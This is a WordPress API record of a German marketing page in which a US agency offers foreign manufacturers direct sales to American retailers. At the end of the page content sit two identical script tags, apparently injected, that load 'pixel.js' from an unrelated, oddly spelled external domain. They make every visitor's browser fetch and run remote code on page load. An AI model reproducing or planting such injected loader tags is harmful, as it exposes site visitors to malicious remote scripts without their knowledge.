{"id":3105,"date":"2014-08-30T10:05:23","date_gmt":"2014-08-30T14:05:23","guid":{"rendered":"https:\/\/americanagent.com\/direct-usa-sales-2-2\/"},"modified":"2014-09-17T12:07:04","modified_gmt":"2014-09-17T16:07:04","slug":"direktvertrieb-ihrer-produkte-in-den-usa","status":"publish","type":"page","link":"https:\/\/americanagent.com\/de\/direktvertrieb-ihrer-produkte-in-den-usa\/","title":{"rendered":"Direktvertrieb Ihrer Produkte in den USA"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-7c4c7e753eac0349fbd5d08955f3a890\">\n#top .av-special-heading.av-av_heading-7c4c7e753eac0349fbd5d08955f3a890{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-7c4c7e753eac0349fbd5d08955f3a890 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-7c4c7e753eac0349fbd5d08955f3a890 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-7c4c7e753eac0349fbd5d08955f3a890 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Direktvertrieb Ihrer Produkte in den USA<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-aaf3a53f7e22769a7798f31e42769683 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>American Agent ist in der Lage sehr effektiven und direkten Vertrieb auf elementarster Ebene durchzuf\u00fchren.<\/p>\n<p>Viele amerikanische Betriebe verlangen Direktvertrieb und direkten Kontakt mit ihren Zulieferern. Im Vertriebsmanagement, speziell im amerikanischen Einzelhandel, wurde instruiert nur mit Herstellern und Vertrieblern zusamenzuarbeiten, die eine direkte Gesch\u00e4ftsbasis und Preisgebung, anbieten. \u201cProvisionsbasierte Au\u00dfendienstmitarbeiter\u201d, \u201cAu\u00dfendienstmitarbeiter des Herstellers\u201d und in letzter Zeit immer h\u00e4ufiger klassische \u201cImporteure\u201d, passen einfach nicht mehr ins Bild.<\/p>\n<p>Aufgrund dessen, gibt es viele Unternehmen die bei amerikanischen K\u00e4ufern und Vertriebspartnern, nicht einmal weiter als zu einer Erstbegutachtung kommen.<\/p>\n<p>Wir verstehen sehr gut, dass Sie vielleicht schon Jahrzehnte lang mit provisionsbasierten Au\u00dfendienstmitarbeitern (die Mitarbeiter erhalten einen Prozensatz des Umsatzes) gearbeitet haben, ungl\u00fccklicherweise wird hier in den USA diese Methodik nicht die gew\u00fcnschten Verkaufsergebnisse erzielen.<\/p>\n<p>Jeden Tag werden wir von Firmen kontaktiert die das erkannt haben \u2013 leider nachdem sie bereits viel Geld und Energie in den amerikanischen Markteinstieg investiert haben.<\/p>\n<p>Wie k\u00f6nnen wir helfen? Unsere Firma ist in der Lage eine Auswahl an amerikanischen Unternehmen \u2013 Einzelhandel, Kaufh\u00e4user usw. die wir sehr gut kennen, zu bieten. Wir k\u00f6nnen uns mit jedem in Verbindung setzen und Ihr Unternehmen dem richtigen Handelspartner f\u00fcr Ihren Gesch\u00e4ftszweig vorstellen. Obgleich um welches Produkt es sich bei Ihnen handelt, diese ersten Schritte m\u00fcssen unternommen werden und wir k\u00f6nnen Ihnen bei diesem Aufwand helfen ohne Wertvolle Zeit zu verschwenden. Unser Ziel ist es, Sie \u00fcber die erste Begutachtung hinaus zu einem zugelassenen Zulieferer zu machen.<\/p>\n<p>Viele K\u00e4ufer wissen bereits das wir uns nicht in die preislichen Angelegenheiten unserer Kunden einmischen und dass wir uns in Verbindung setzen um einen direkten Kontakt mit Ihrem Firmensitz herzustellen. Denjenigen die es noch nicht wissen, ist es das erste was wir ihnen erkl\u00e4ren. So ist es sogar auf der Startseite\u00a0unserer Website zu lesen. Auf diese Art und Weise fangen wir das Interesse dieser Gesch\u00e4ftspartner und bringen den Verkaufsprozess ins Laufen.<\/p>\n<p>Die Zusammenarbeit mit uns erlaubt Ihnen sich auf ihre lokalen Aktivit\u00e4ten zu konzentrieren und Sie m\u00fcssen Ihre Zeit nur aufwenden wenn ein ernstzunehmender amerikanischer Kunde sich f\u00fcr ihren Vertrieb interessiert. Sie k\u00f6nnen uns als Ihr eigenes amerikanisches Verkaufsb\u00fcro betrachten.<\/p>\n<p>Bitte besuchen Sie auch die \u201cSupportleistungen f\u00fcr Unternehmen\u201d-Seite. Den Direktvertrieb in den USA zu betreiben, ben\u00f6tigt oft auch die Bearbeitung von anderen Gesch\u00e4ftsbereichen. American Agent ist in der Lage die besten L\u00f6sungen in jeder Situation zu finden, um Ihrem Unternehmen zu den besten Voraussetzungen und Gesch\u00e4ftsl\u00f6sungen f\u00fcr den amerikanischen Markt zu verhelfen.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3105","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent - Direktvertrieb in den USA<\/title>\n<meta name=\"description\" content=\"Viele amerikanische Betriebe verlangen Direktvertrieb und direkten Kontakt mit ihren Zulieferern. Mit American Agent wird Ihre Marktplazierung optimiert.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/de\/direktvertrieb-ihrer-produkte-in-den-usa\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent - Direktvertrieb in den USA\" \/>\n<meta property=\"og:description\" content=\"Viele amerikanische Betriebe verlangen Direktvertrieb und direkten Kontakt mit ihren Zulieferern. Mit American Agent wird Ihre Marktplazierung optimiert.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/de\/direktvertrieb-ihrer-produkte-in-den-usa\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-17T16:07:04+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/direktvertrieb-ihrer-produkte-in-den-usa\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/direktvertrieb-ihrer-produkte-in-den-usa\\\/\",\"name\":\"American Agent - Direktvertrieb in den USA\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\"},\"datePublished\":\"2014-08-30T14:05:23+00:00\",\"dateModified\":\"2014-09-17T16:07:04+00:00\",\"description\":\"Viele amerikanische Betriebe verlangen Direktvertrieb und direkten Kontakt mit ihren Zulieferern. Mit American Agent wird Ihre Marktplazierung optimiert.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/direktvertrieb-ihrer-produkte-in-den-usa\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/de\\\/direktvertrieb-ihrer-produkte-in-den-usa\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/direktvertrieb-ihrer-produkte-in-den-usa\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Direktvertrieb Ihrer Produkte in den USA\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent - Direktvertrieb in den USA","description":"Viele amerikanische Betriebe verlangen Direktvertrieb und direkten Kontakt mit ihren Zulieferern. Mit American Agent wird Ihre Marktplazierung optimiert.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/de\/direktvertrieb-ihrer-produkte-in-den-usa\/","og_locale":"de_DE","og_type":"article","og_title":"American Agent - Direktvertrieb in den USA","og_description":"Viele amerikanische Betriebe verlangen Direktvertrieb und direkten Kontakt mit ihren Zulieferern. Mit American Agent wird Ihre Marktplazierung optimiert.","og_url":"https:\/\/americanagent.com\/de\/direktvertrieb-ihrer-produkte-in-den-usa\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-17T16:07:04+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/de\/direktvertrieb-ihrer-produkte-in-den-usa\/","url":"https:\/\/americanagent.com\/de\/direktvertrieb-ihrer-produkte-in-den-usa\/","name":"American Agent - Direktvertrieb in den USA","isPartOf":{"@id":"https:\/\/americanagent.com\/de\/#website"},"datePublished":"2014-08-30T14:05:23+00:00","dateModified":"2014-09-17T16:07:04+00:00","description":"Viele amerikanische Betriebe verlangen Direktvertrieb und direkten Kontakt mit ihren Zulieferern. Mit American Agent wird Ihre Marktplazierung optimiert.","breadcrumb":{"@id":"https:\/\/americanagent.com\/de\/direktvertrieb-ihrer-produkte-in-den-usa\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/de\/direktvertrieb-ihrer-produkte-in-den-usa\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/de\/direktvertrieb-ihrer-produkte-in-den-usa\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/de\/"},{"@type":"ListItem","position":2,"name":"Direktvertrieb Ihrer Produkte in den USA"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/de\/#website","url":"https:\/\/americanagent.com\/de\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/3105","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/comments?post=3105"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/3105\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/media?parent=3105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}